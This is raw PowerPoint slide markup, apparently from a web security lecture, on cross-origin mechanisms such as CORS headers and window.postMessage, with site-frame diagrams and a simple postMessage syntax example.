              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:round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en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36875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3581400"/>
            <a:ext cx="7620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6876" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2222500" y="4306888"/>
            <a:ext cx="1816100" cy="246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600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>www.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36877" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3916363" y="3581400"/>
            <a:ext cx="1223962" cy="304800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26" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="3405188"/>
            <a:ext cx="2286000" cy="1147762"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F8DD6C"/>
              </a:gs>
              <a:gs pos="20000">
                <a:srgbClr val="F4DB6E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BBA753"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="E9D57C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0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36879" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7556501" y="4229101"/>
            <a:ext cx="19399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>
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>chat.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36880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0" y="3471863"/>
            <a:ext cx="7620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688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54976" y="2073275"/>
            <a:ext cx="936625" cy="58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6882" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="1676400"/>
            <a:ext cx="2413000" cy="338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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>chat.facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8034338" y="2759076"/>
            <a:ext cx="1060450" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37730"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901"/>
            </a:srgbClr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en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3386138" y="2759076"/>
            <a:ext cx="1060450" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33361"/>
              <a:gd name="adj2" fmla="val 37730"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC">
              <a:alpha val="74901"/>
            </a:srgbClr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en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6229350" y="3657601"/>
            <a:ext cx="1309688" cy="327025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endParaRPr lang="en-US"/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4189414" y="3459163"/>
            <a:ext cx="655637" cy="601662"/>
            <a:chOff x="5608626" y="1600199"/>
            <a:chExt cx="655015" cy="602082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36889" name="Straight Connector 34"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5608626" y="1600200"/>
              <a:ext cx="655014" cy="602081"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000" cap="rnd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36890" name="Straight Connector 35"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="5608628" y="1600199"/>
              <a:ext cx="655013" cy="602081"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grp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620000" y="4210050"/>
            <a:ext cx="1792288" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>facebook.com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4589464" y="4060825"/>
            <a:ext cx="2497137" cy="36195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 wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>facebook.com</a:t>
            </a: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29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4960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5" grpId="0" animBg="1"/>
      <p:bldP spid="2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>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Additional mechanisms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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2073276" y="2079626"/>
            <a:ext cx="8069263" cy="40243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4290" tIns="34290" rIns="34290" bIns="34290" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="296863" lvl="1" indent="-296863">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Cross-origin network requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754063" lvl="2" indent="-296863">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: &lt;list of domains&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754063" lvl="2" indent="-296863">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="296863" lvl="1" indent="-296863">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Cross-origin client side communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754063" lvl="2" indent="-296863">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Client-side messaging via navigation (old browsers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754063" lvl="2" indent="-296863">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t> (modern browsers)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167941" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467601" y="1714501"/>
            <a:ext cx="1439863" cy="1165225"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:round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en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3789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0501" y="479425"/>
            <a:ext cx="936625" cy="5857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789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93263" y="446088"/>
            <a:ext cx="938212" cy="582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7895" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9688514" y="156955"/>
            <a:ext cx="751809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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37896" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7904164" y="202992"/>
            <a:ext cx="74135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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167946" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9182100" y="1714500"/>
            <a:ext cx="1371600" cy="1149350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:round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endParaRPr lang="en-US">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37898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10500" y="1782763"/>
            <a:ext cx="7620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7899" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7535864" y="2606676"/>
            <a:ext cx="1284287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600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t> context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37900" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8496301" y="822325"/>
            <a:ext cx="1096963" cy="871538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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37901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56738" y="1714500"/>
            <a:ext cx="7620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7902" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9217025" y="2606676"/>
            <a:ext cx="1290638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1600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>B context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37903" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8702675" y="822325"/>
            <a:ext cx="1028700" cy="871538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7904" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9936163" y="822326"/>
            <a:ext cx="0" cy="823913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7905" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8221663" y="822326"/>
            <a:ext cx="0" cy="823913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67955" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="8770939" y="2057400"/>
            <a:ext cx="547687" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst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67956" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="8770939" y="2332038"/>
            <a:ext cx="547687" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst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981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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="-1404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/>
              <a:t>window.postMessage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Content Placeholder 4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1981200" y="85833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API for inter-frame communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Supported in standard browsers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ko-KR" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>A network-like channel between frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916" name="Picture 62" descr="safar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2077529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64" descr="firef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077530"/>
            <a:ext cx="533400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65" descr="oper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2077530"/>
            <a:ext cx="5334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130" descr="ie-6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1400" y="2077529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0" name="Picture 10" descr="chrome-logo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27926" y="2077529"/>
            <a:ext cx="5492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18387" y="3525330"/>
            <a:ext cx="1676400" cy="2003425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</p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38922" name="Right Arrow 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5513387" y="3982529"/>
            <a:ext cx="1905000" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49989"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="009900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</a:rPr>
              <a:t>Add a contact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38923" name="Right Arrow 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5513387" y="4803267"/>
            <a:ext cx="1828800" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49946"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="009900"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med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</a:rPr>
              <a:t>Share contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38924" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438401" y="3449129"/>
            <a:ext cx="6961187" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect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38925" name="Picture 28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27387" y="4474655"/>
            <a:ext cx="1752600" cy="65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24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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2467157"/>
            <a:ext cx="7772400" cy="16002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39" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="1187632"/>
            <a:ext cx="7772400" cy="8382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0" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="158094"/>
            <a:ext cx="10515600" cy="806632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39941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838200" y="1092382"/>
            <a:ext cx="10515600" cy="4351338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endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>frames[0].postMessage("Attack at dawn!",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>                      "http://b.com/");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
